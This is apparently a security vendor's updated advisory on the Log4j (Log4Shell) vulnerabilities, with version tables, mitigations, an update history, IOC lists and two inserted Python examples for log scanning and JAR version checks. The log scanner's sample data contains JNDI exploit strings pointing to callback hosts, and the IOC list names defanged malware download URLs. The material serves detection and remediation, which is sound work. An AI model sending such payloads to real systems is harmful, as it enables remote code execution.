Updated 12/29

A zero-day vulnerability in the Log4j 2 utility was publicly disclosed on December 9, 2021, via the Apache GitHub. Log4j 2 is an open-source Java logging library integrated into many enterprise applications, as well as open-source software and other services. Its widespread use and the variety of configurations in which it runs make this a high-impact threat.

ReliaQuest has been tracking the vulnerability since it was first disclosed. This blog will provide ongoing status updates and recommendations for mitigating the impact of Log4j in customer environments. Additional details on the Log4Shell vulnerability and tools to respond are available in Log4Shell and ReliaQuest Solutions. 

The information below is accurate as of Wednesday, December 29

Latest Updates

  • A new version of Log4J was released (2.17.1) that patches a newly identified vulnerability (CVE-2021-44832) which enables remote code execution when the following non-default pre-conditions are met [Source 20]:
    • The configuration of Log4J is being loaded from a remote server
      OR
    • A threat actor has permissions to alter the Log4J configuration file AND the JDBC log appender feature is used with a dynamic URL address.
  • The newly identified exploit still uses outbound LDAP in its attack chain, meaning that mitigations and threat hunts (‘Log4j RCE Response Traffic Hunt’, available in GreyMatter) are still applicable to this vulnerability.
  • Due to the highly specific pre-conditions and lower CVSS score, ReliaQuest assesses that this vulnerability will not be as widely exploited as CVE-2021-44228.

Affected Versions

  • 2.17.0 (CVE-2021-44832: Remote Code Execution, CVSS 6.6 Medium)
  • 2.16.0 (CVE-2021-45105: Denial-of-Service, CVSS 7.5 High)
  • 2.15.0 (CVE-2021-45046: Limited Remote Code Execution, CVSS 9.0 Critical)
  • <2.15.0 (CVE-2021-44228: Remote Code Execution, CVSS 10.0 Critical)

Patched Versions

  • 2.17.1

Standing Customer Recommendations

  • Update Log4j to version 2.17.1.
  • Configure perimeter controls (WAF, IDS/IPS) to block Log4j related signatures.
  • Ensure logging of web infrastructure (e.g., servers, reverse proxies, load balancers), prioritizing vulnerable externally facing and critical internal hosts.
  • Ensure endpoint visibility on all systems, prioritizing vulnerable externally facing and critical internal hosts.
  • Provide ReliaQuest a list of vulnerable hosts and vulnerability scanners (tracking tickets created).
  • If possible, block outbound RMI, LDAP, and DNS traffic.
  • Investigate anomalous internal scanning activity for evidence of the internal WebSocket attack vector [Source 13].

ReliaQuest Detections

ReliaQuest is deploying the following detection capabilities:

  • IOC matches for systems known to exploit this vulnerability
  • RQ-SC-002650-07 – Log4j User Agent RCE
  • RQ-SC-002652-02 – Log4j Scanning and Response Traffic
  • RQ-SH-002659-01 – Java Spawning Suspicious Child Processes – has been deployed for customers where Carbon Black Threat Hunter is managed by ReliaQuest.

ReliaQuest GreyMatter Hunt

ReliaQuest is actively hunting in both SIEM and EDR customer environments for activity related to this campaign, with a focus on successful exploitation using host-based telemetry.

  • Log4j RCE (CVE-2021-44228) campaign is available for customers to run through GreyMatter Hunt.

ReliaQuest SIEM and EDR Patching

  • ReliaQuest has been in communication with SIEM and EDR Original Equipment Manufacturer (OEM) vendors to understand their response and is working alongside customers to mitigate any risk. See the latest patch updates above.

———————————————————————————————

Description

A remote code execution vulnerability was discovered in Apache Log4j and is being actively exploited. When crafted input reaches an application that logs it with a vulnerable version of the library, the lookup string embedded in that input is evaluated. Current exploitation of this vulnerability leverages LDAP calls to malicious servers that redirect to malicious Java class files for execution. Other methods of exploitation exist as well and are still being discovered. As of this writing, a typical observance of this attack contains the following in a web request log: “${jndi:[PROTOCOL]://[MALICIOUS SERVER]/}”. Indicators of Compromise (IOCs) are added to the ReliaQuest Emergency Feed as they are identified. ReliaQuest has already identified IP addresses conducting scanning activities and has added them to our detection feeds.
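As an added example (not ReliaQuest's code, and not one of the detections or tools referenced in this advisory), the following Python script shows the kind of check behind "scanning and response traffic" detection: it parses web-server access-log lines in the common combined format, looks for the `${jndi:...}` lookup string described above in the request line, Referer and User-Agent fields, in both raw and percent-decoded form, and extracts the callback protocol and server so they can be correlated with outbound LDAP, RMI or DNS connections from the web host. The log lines, client addresses and callback addresses are constructed samples, not observed indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Addresses and
# payloads are made up for this example and are not observed indicators.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:03:13:01 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.7 - - [10/Dec/2021:03:13:09 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.8 - - [10/Dec/2021:03:14:22 +0000] "GET /api HTTP/1.1" 200 10 "${JNDI:dns://203.0.113.50/x}" "Mozilla/5.0"
"""

# Combined log format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The lookup string from the description above: ${jndi:<protocol>://<server>[:port]/...}
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<proto>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?',
    re.IGNORECASE,
)


def find_jndi_lookups(field):
    """Return unique (protocol, host, port) tuples found in one log field.

    The field is checked as logged and after percent-decoding, because the
    payload may arrive URL-encoded in the request line.
    """
    hits = []
    for text in (field, unquote(field)):
        for m in JNDI_RE.finditer(text):
            hit = (m.group("proto").lower(), m.group("host"), m.group("port"))
            if hit not in hits:
                hits.append(hit)
    return hits


def scan_access_log(log_text):
    """Parse each line and report every JNDI lookup string with its source field."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would record the parse failure
        for field in ("request", "referer", "agent"):
            for proto, host, port in find_jndi_lookups(m.group(field)):
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "field": field,
                    "protocol": proto,
                    "callback_host": host,
                    "callback_port": port,
                })
    return findings


def callback_targets(findings):
    """Distinct (protocol, host, port) callbacks to correlate with egress logs.

    An outbound LDAP/RMI/DNS connection from the web host to one of these is the
    signal that the lookup was evaluated, not merely logged.
    """
    targets = {(f["protocol"], f["callback_host"], f["callback_port"]) for f in findings}
    return sorted(targets, key=lambda t: (t[0], t[1], t[2] or ""))


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("callbacks to correlate with outbound traffic:", callback_targets(hits))
```

A request-log match on its own only proves that a scanner or attacker sent the string; pairing each finding's callback tuple with firewall or proxy egress logs for the web host is what separates attempted from successful exploitation, which is also why the standing recommendation to block outbound RMI, LDAP and DNS matters.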

Vulnerability Discovery

NOTE: Some tools can leak information about your environment. ReliaQuest recommends evaluating the impact to your organization before using them.

  • CISA has compiled a list of affected software/systems listing the vendor, product, version, and vulnerability status [Source 9].
  • An open source scanner for identifying vulnerable hosts is available here [Source 10].
  • Another tool was published to GitHub for testing the exploit against your systems [Source 11].
  • Many vulnerability scanners have developed plugins to scan and identify vulnerable software. Check with your preferred scanner.
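As an added example, not ReliaQuest's code and not either of the scanners referenced above, here is a Python script that locates log4j-core on disk and maps what it finds to the Affected/Patched Versions table in this advisory. It reads the version from the JAR's Maven `pom.properties`, records whether `JndiLookup.class` is present (the class removed by the "remove the JNDI classes" mitigation mentioned in this advisory), looks into JARs bundled inside WAR/EAR archives, and runs entirely locally, so it sends nothing out of the environment. The JARs it builds for its own demonstration are constructed stand-ins, not the real library.

```python
import io
import os
import re
import tempfile
import zipfile

# Maven metadata file that a log4j-core JAR carries (standard Maven packaging layout).
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class removed by the "remove the JNDI classes" mitigation noted in this advisory.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.15.0' -> (2, 15, 0); a suffix such as '2.0-beta9' keeps only its numeric prefix."""
    nums = [int(n) for n in re.findall(r"(?:^|\.)(\d+)", text)]
    return tuple((nums + [0, 0, 0])[:3])


def classify(version):
    """Most severe outstanding CVE for a log4j-core 2.x version, per the version table above."""
    v = parse_version(version)
    if v < (2, 0, 0):
        return "log4j 1.x: outside the 2.x version table above"
    if v >= (2, 17, 1):
        return "patched (2.17.1 or later)"
    if v == (2, 17, 0):
        return "affected: CVE-2021-44832 (RCE, CVSS 6.6)"
    if v == (2, 16, 0):
        return "affected: CVE-2021-45105 (DoS, CVSS 7.5)"
    if v == (2, 15, 0):
        return "affected: CVE-2021-45046 (limited RCE, CVSS 9.0)"
    return "affected: CVE-2021-44228 (RCE, CVSS 10.0)"


def _inspect_zip(zf, label, findings, depth):
    """Record log4j-core evidence in one archive, then recurse into bundled JARs."""
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version or has_jndi:
        status = classify(version) if version else \
            "log4j-core classes present, version unknown: treat as affected"
        findings.append({"path": label, "version": version,
                         "jndi_lookup_present": has_jndi, "status": status})
    if depth < 2:  # JARs bundled in WAR/EAR files (e.g. WEB-INF/lib)
        for name in names:
            if name.lower().endswith(".jar"):
                try:
                    with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                        _inspect_zip(inner, label + "!" + name, findings, depth + 1)
                except zipfile.BadZipFile:
                    continue


def scan_tree(root):
    """Walk a directory tree and report every archive that contains log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, name)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                try:
                    with zipfile.ZipFile(path) as zf:
                        _inspect_zip(zf, label, findings, 0)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda f: f["path"])


def make_log4j_core_jar(version, include_jndi_lookup=True):
    """Minimal constructed stand-in for a log4j-core JAR (test data, not the real library)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                                    "artifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def run_demo():
    """Create a throwaway directory of constructed archives and scan it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(make_log4j_core_jar("2.14.1"))
        with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as fh:
            fh.write(make_log4j_core_jar("2.17.1"))
        # A WAR bundling 2.16.0 with JndiLookup.class removed (class-removal mitigation applied).
        with zipfile.ZipFile(os.path.join(root, "app", "web.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar",
                         make_log4j_core_jar("2.16.0", include_jndi_lookup=False))
        with zipfile.ZipFile(os.path.join(root, "app", "other.jar"), "w") as other:
            other.writestr("com/example/Other.class", b"\xca\xfe\xba\xbe")  # unrelated JAR
        return scan_tree(root)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Point `scan_tree` at an application's installation directory to get one record per log4j-core copy, including copies nested in deployed WARs; the `jndi_lookup_present` field tells you whether the class-removal mitigation has already been applied to a copy that the version check still reports as affected.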

Helpful Resources

  • Blog covering ReliaQuest’s Log4Shell discovery solution (https://www.reliaquest.com/blog/log4shell-overview-and-reliaquest-solutions/)
  • Splunk patching guide (https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html)
  • IBM QRadar patching guide (https://www.ibm.com/support/pages/node/6528440?myns=swgother&mynp=OCSSBQAC&mync=E&cm_sp=swgother-_-OCSSBQAC-_-E)
  • CISA vendor status GitHub site (https://github.com/cisagov/log4j-affected-db)


Sources

[1] https://www.lunasec.io/docs/blog/log4j-zero-day/

[2] https://github.com/tangxiaofeng7/apache-log4j-poc

[3] https://logging.apache.org/log4j/2.x/security.html

[4] https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

[6] https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

[7] https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

[8] https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/

[9] https://github.com/cisagov/log4j-affected-db

[10] https://github.com/fullhunt/log4j-scan

[11] https://github.com/huntresslabs/log4shell-tester

[12] https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/

[13] https://www.blumira.com/analysis-log4shell-local-trigger/

[14] https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi

[15] https://github.com/curated-intel/Log4Shell-IOCs

[16] https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html

[17] https://www.ibm.com/support/pages/node/6528440?myns=swgother&mynp=OCSSBQAC&mync=E&cm_sp=swgother-_-OCSSBQAC-_-E

[18] https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/

[19] https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

[20] https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

Severity Criteria
✓ This technique can propagate without user interaction
✓ This technique can cause serious impacts
✓ This technique affects nearly all Java platforms
✓ This technique is a major security event

Advisory History

  • 12/27 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. The ReliaQuest Threat Management Team will continue to monitor the landscape for any significant threat events or the announcement of any major vulnerability changes. Given the lack of significant updates in the past 5 days, ReliaQuest is transitioning from a daily advisory update cadence to updates on significant threat events or vulnerability changes. For customers that have been following our daily advisory updates, the implicit assumption will be “no significant updates” unless otherwise noted in a new advisory.
  • 12/26 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/25 20:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/24 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest will continue to monitor the situation closely as this could change at any time.
  • 12/23 21:00 UTC – No significant updates regarding the vulnerability or threat landscape surrounding Log4Shell. ReliaQuest and other security vendors like Cloudflare have noticed a decrease in exploit attempts compared to last week.
  • 12/22 21:00 UTC – CISA has released a joint advisory covering in-depth technical details and mitigations for the Log4j vulnerability [Source 19]. Threat actors have been observed using Log4Shell as a means to pivot/move laterally to vulnerable internal applications like VMware vCenter [Source 18]. LogRhythm Elasticsearch versions prior to 5.6.10 require additional remediation steps to mitigate CVE-2021-44228. ReliaQuest customers requiring additional remediation steps have been contacted. More information is available within the LogRhythm community website. ReliaQuest is actively evaluating additional detection within Endpoint Detection and Response (EDR) technologies for this threat. Customers owning Carbon Black Threat Hunter have received the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. Customers owning SentinelOne managed by ReliaQuest have received or will receive the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. This rule is not eligible for deployment via CrowdStrike but has been incorporated into Threat Hunting (see additional information below).
  • 12/21 22:00 UTC – No significant updates regarding the vulnerability itself. ReliaQuest is actively evaluating additional detection within Endpoint Detection and Response (EDR) technologies for this threat. Customers owning Carbon Black Threat Hunter managed by ReliaQuest have received or will receive the rule ‘RQ-SH-002659-01 – Java Spawning Suspicious Child Processes’. A new version of Splunk Enterprise was made available which updates the Log4j package to 2.16. ReliaQuest recommends not installing this release. Splunk has stated that they are working on a release that will implement Log4j 2.17; once that release is available, ReliaQuest will validate its functionality and then recommend that customers upgrade their Splunk deployments [Source 16]. IBM released an interim solution to a Log4j vulnerability in the Risk Manager component of QRadar. Version 7.4.3 FixPack 4 and version 7.3.3 FixPack 10 are available for QRadar. It is recommended to apply the applicable fix pack if your organization uses the Risk Manager component of QRadar. Otherwise, it is not recommended to install the update, as no attack vector is present and it only updates Log4j to 2.16 rather than 2.17. ReliaQuest will validate any additional updates and continue to advise [Source 17]. LogRhythm has stated that the additional vulnerabilities (CVE-2021-45046 and CVE-2021-45105) appear to have been remediated.
  • 12/20 22:00 UTC – No significant updates regarding the vulnerability, though more information has come to light on the threats using it. ReliaQuest has identified threat actors using vulnerabilities in Log4j to drop binaries related to ransomware, Cobalt Strike, or cryptocurrency miners [Source 15]. Log4j version 2.17.0 was released on 12/18, patching the Denial-of-Service in 2.16.0 (CVE-2021-45105) [Source 3].
  • 12/18 00:00 UTC – A new attack vector has been identified that has increased the attack surface of these vulnerabilities. A user browsing to a malicious webpage can execute JavaScript that makes WebSocket connections to internal hosts and issues HTTP requests containing the exploit string. The vulnerabilities haven’t changed, but hosts that are not publicly facing can now be targeted more easily. Exercise additional vigilance when investigating internal traffic matching the signatures of this exploit, as it could be related to this new attack vector.
  • 12/17 18:00 UTC – A limited Denial-of-Service vulnerability has been discovered in version 2.16.0 that will be fixed in the upcoming 2.17.0 release. We still recommend updating to 2.16.0 until 2.17.0 is released, as 2.16.0 fixes more-severe Remote Code Execution vulnerabilities. The Denial-of-Service vulnerability in version 2.16.0 can be mitigated by removing the JNDI classes entirely, but this has the potential to introduce other application-breaking changes.
  • 12/17 15:00 UTC – The CVSS score for CVE-2021-45046 has been updated from 3.7 (limited Denial-of-Service) to 9.0 (limited Remote Code Execution). Message lookups can still be manually enabled in non-default configurations or occur in places not affected by the formatMsgNoLookups flag. Further, a bypass for the localhost network connection restriction has been identified which would allow these lookups to connect outbound. We highly recommend updating Log4j to version 2.16.0 to remove support for message lookup patterns entirely and disable JNDI functionality by default.
  • 12/14 22:30 UTC – A new vulnerability – CVE-2021-45046 – was identified in Log4j version 2.15.0 that enables a Denial-of-Service scenario. Patching systems leveraging Log4j to version 2.16.0 is the best option, as it provides some additional hardening features related to this vulnerability. The following MITRE techniques are leveraged:
    T1203 – Exploitation for Client Execution

ReliaQuest has the following detection capabilities available:
Building Block: 002650 – Log4j User Agent RCE
Hunt: 002651 – log4j RCE (CVE-2021-44228)
Rule: 002652 – Log4j Scanning and Response Traffic

ReliaQuest has the following IOCs available within GreyMatter Intel:
Signature: 2034647
Signature: 2034648
Signature: 2034649
Domain: bingsearchlib[.]com
Signature: 91991
Signature: 2034650
Signature: 2034652
Signature: 2034651
Hash: e3eb1e98ca477918154b9ed7bcc2b7fe757c1020
Hash: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c
Hash: f6e51ea341570c6e9e4c97aee082822b
Hash: 9147d834f4cb7047a6e6ab96565868c6fede373e
Hash: eb76b7fb22dd442ba7d5064dce4cec79e6db745ace7019b6dfe5642782bf8660
Hash: c717c47941c150f867ce6a62ed0d2d35
Hash: f568eb59fd37b2fe37db730292594d875d3a11e8
Hash: e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1
Hash: 1718956642fbd382e9cde0c6034f0e21
Hash: 799dd1a2181eb252499b775119b6b5bef4760b89
Hash: c70e6f8edfca4be3ca0dc2cfac8fddd14804b7e1e3c496214d09c6798b4620c5
Hash: cf2ce888781958e929be430de173a0f8
Hash: e851126ef41e3dc474238d3160f4b0e7e3bbb7ec
Hash: 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26
Hash: 40e3b969906c1a3315e821a8461216bb
Hash: 0fb3020e3c38de5beae21622a910754241859d42
Hash: 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
Hash: 6d275af23910c5a31b2d9684bbb9c6f3
Hash: 777c54e96d29a0ed6ddf9698c86afb74322c130f
Hash: 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
Hash: 1348a00488a5b3097681b6463321d84c
Hash: 1d1866b00f948c103a9076b39061bde5c1f68350
Hash: 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
Hash: 648effa354b3cbaad87b45f48d59c616
Hash: 0194637f1e83c2efc8bcda8d20c446805698c7bc
Hash: 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
Hash: 2fbc3b9421bc770831a724d9e467c7dbc220dc41c0ca21d33a45893be4ff82d4
Hash: 95d9a068529dd2ea4bb4bef644f5c4f5
Hash: 17542b2d0614bb363614e734ea1dde508cb7496b
Hash: 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
URL: https://62[.]210[.]130[.]250/lh[.]sh
URL: https://93[.]189[.]42[.]8/kinsing
Signature: 58722
Signature: 58723
Signature: 58724
Signature: 58725
Signature: 58726
Signature: 58727
Signature: 58728
Signature: 58729
Signature: 58730
Signature: 58731
Signature: 58732
Signature: 58733
Signature: 58734
Signature: 58735
Signature: 58736
Signature: 58737
Signature: 58738
Signature: 58739
Signature: 58740
Signature: 58741
Signature: 58742
Signature: 58743
Signature: 58744
Signature: 300055
Signature: 300056
Signature: 300057
Signature: 300058
Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-1
Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-1
Signature: Unix[.]Malware[.]Mirai-9914842-0
Signature: Unix[.]Malware[.]Mirai-9914843-0
Signature: Linux[.]PossibleKinsingMalware[.]ioc
Signature: 58751
Signature: W32[.]PossibleTomcatLog4ShellExploit[.]ioc
Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-2
Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-4
Signature: Java[.]Exploit[.]CVE_2021_44228-9915330-0
Signature: apache: Apache[.]Log4j[.]Error[.]Log[.]Remote[.]Code[.]Execution
Signature: ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)
Signature: ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)